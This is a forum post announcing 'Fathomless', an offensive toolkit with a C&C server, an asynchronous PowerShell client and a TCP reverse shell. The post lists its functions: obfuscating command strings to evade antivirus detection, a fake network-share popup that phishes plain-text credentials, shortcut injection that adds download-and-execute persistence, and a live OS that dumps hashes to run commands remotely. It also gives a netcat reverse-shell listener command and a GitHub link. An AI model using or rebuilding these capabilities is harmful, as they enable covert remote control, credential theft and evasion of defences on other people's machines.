Jump to content



Recommended Posts

Fathomless has been a project I have been working on and includes some new tools.

Running environment is Ubuntu 14.04 LTS

Updated the description below to include recent changes.

Async Shell Handler:

Provides a prototype C&C web server along with an asynchronous powershell
client, and a basic command interface. The server is hosted on an lighttpd server
using HTTPS with a self-signed certificate. Since the C&C is a cgi hosted on a
lighttpd server you can edit the included lighttpd.conf to only allow connections
from the expected IP range.
The async client performs basic key fingerprint comparison for the self-signed
cert and basic authentication to the C&C. These values are randomly generated
upon installation. All requests and responses from the client are performed
via HTTPS GET requests with url safe base64 encoded strings.
The client initially operates in memory so if it exits or the system reboots
the process will be terminated and flushed from memory.
Limited persistence has been added via the shortcut-inject function avaliable
in the async and tcp powershell clients.
The tcp reverse shell version of the client does not require the C&C component
just an open tcp port with netcat
ex: nc -lvvp 443
Available functions from the client:
* get-info
Displays a summary of current host
* exec-script "name-of-script"
Executes script hosted server side in /var/async-shell/ps-scripts by IEX
requires the name of the script filename as a parameter.
* obfuscate "name of text file / script"
Uses a polyalphabetic obfuscation method on base64 strings
writes obfuscated string to file and provides a de-obfuscation key.
* de-obfuscate "(name of text file / script), (key)"
Performs the inverse of the obfuscation function requires
the text file with the obfuscated base64 data and
de-obfuscation key as parameters.
* gen-key
generates a random alphabetic string for use with the
obfuscate-base64 function.
* obfuscate-base64 "(action:hide or clear ), (key: obfuscation or de-ofuscation), (base64-string)"
The function that contains the obfuscation engine, it works only with clear base64 data.
* byte-encode ( binary-to-obfuscate, key )
Performs byte-encoding prior to converting to obfuscated
base64 provide key de-obfuscation.
* byte-decode ( file-containing-obfu-base64, key )
performs the reverse of byte-encode, requires the de-obfuscation key.
* askfor-creds
Performs some social engineering in order to acquire plain-text credentials. This is done
by generating a authentication popup which seems to reconnect to a network share.
* gen-enccmd "your command string"
Generates a PowerShell formatted encoded command. Insure to quote your command
ex: gen-enccmd "cmd /c ipconfig /all"
* shortcut-inject "name-of-lnk" "Url-hosting-script"
Modifies the specified shortcut to run the original program and also execute a download
and execute command string. Ex: "Google Chrome.lnk" "full url to powershell script"
Requires the http:// or https:// in the URL.
Enables execution of a command string on systems while evading countermeasures,
specifically AV signature based detection. This is accomplished by focusing on
obfuscating command strings that typically download a short script
involved in first-stage/initial access.


Live OS that dumps hashes and uses them with winexe to execute commands on remote systems.

I haven't updated it yet since I have been waiting for UEFI support to mature (shim & preloader).

Once that happens I will invest time in it.

Find it on github (.) com/xor-function/fathomless

Let me know if you run into issues.

Edited by xor-function
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...